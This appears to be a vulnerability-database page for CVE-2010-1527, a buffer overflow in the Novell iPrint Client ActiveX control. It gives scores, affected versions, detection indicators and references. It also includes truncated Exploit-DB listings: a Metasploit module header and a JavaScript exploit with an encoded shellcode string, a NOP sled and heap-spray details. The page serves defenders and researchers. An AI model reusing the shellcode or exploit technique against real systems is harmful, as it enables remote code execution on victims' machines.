CVE-2010-1527
Published 2010-08-23. CVE-2010-1527: Stack-based buffer overflow in Novell iPrint Client before 5.44 allows remote attackers to execute arbitrary code via a long call-back-url parameter in an…
Priority: P265 · Severity: critical · CVSS 2.0 base score: 9.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public exploit available
EPSS: 35.99% (98.3rd percentile)
Stack-based buffer overflow in Novell iPrint Client before 5.44 allows remote attackers to execute arbitrary code via a long call-back-url parameter in an op-client-interface-version action.
Affected
15 ranges listed; only the first carries version data.
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| novell | iprint | <= 5.42 | — |
Detection & IOCs (extracted from sources)
- Alert on HTTP responses containing the iPrint ActiveX CLSID combined with a 'call-back-url' parameter passed to an 'op-client-interface-version' action, especially with abnormally long parameter values.
- Heap spray pattern: look for repeated 0x0A0A0A0A dword sequences in JavaScript unescape() calls within HTML pages that also reference the iPrint ActiveX CLSID.
- Monitor for ienipp.ocx being loaded by iexplore.exe on versions 5.4.0.0 or 5.4.2.0 (file versions prior to 5.44); these are confirmed vulnerable versions.
- The Metasploit module payload space is limited to 1024 bytes and null bytes (0x00) are bad characters; payloads must be encoded accordingly.
- The exploit was confirmed working only against Novell iPrint Client 5.40 and 5.42 on Windows XP SP3 and Vista SP2 with IE 7; the single target uses a heap-spray return address (0x0A0A0A0A) rather than a fixed module address.
- EXITFUNC is set to 'process', meaning the exploit terminates the browser process on exit; this may affect post-exploitation stability.
No detection rules found.
Exploit-DB
Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)
exploitdb · 2010-09-21 · CVSS 9.3 · CVE-2010-1527 [CRITICAL]
---
```text
##
# $Id: novelliprint_callbackurl.rb 10429 2010-09-21 18:46:29Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# novelliprint_callbackurl.rb
#
# Novell iPrint Client ActiveX Control call-back-url Buffer Overflow exploit for the Metasploit Framework
#
# Exploit successfully tested on the following platforms:
# - Novell iPrint Client 5.40 on Internet Explorer 7, Windows XP SP3
# - Novell iPrint Client 5.42 on Internet Explorer 7, Windows XP SP3
# - Novell iPrint Client 5.42 on Intern
```
(source listing truncated here)
Exploit-DB
Novell iPrint Client Browser Plugin - 'call-back-url' Remote Stack Overflow
exploitdb · 2010-09-19 · CVSS 9.3 · CVE-2010-1527 [CRITICAL]
---
```text
'''
 __  __  ____   _   _  ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _
shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');
nops=unescape('%u9090%u9090');
headersize =20;
slackspace= headersiz
```
(source listing truncated here)
Metasploit
Novell iPrint Client ActiveX Control call-back-url Buffer Overflow
This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42. When an overly long string is sent as the 'call-back-url' parameter of an op-client-interface-version action handled by ienipp.ocx, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/40805
- http://secunia.com/secunia_research/2010-104/
- http://www.novell.com/support/viewContent.do?externalId=7006679
- http://www.securityfocus.com/bid/42576
- https://exchange.xforce.ibmcloud.com/vulnerabilities/61220
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11973
Published: 2010-08-23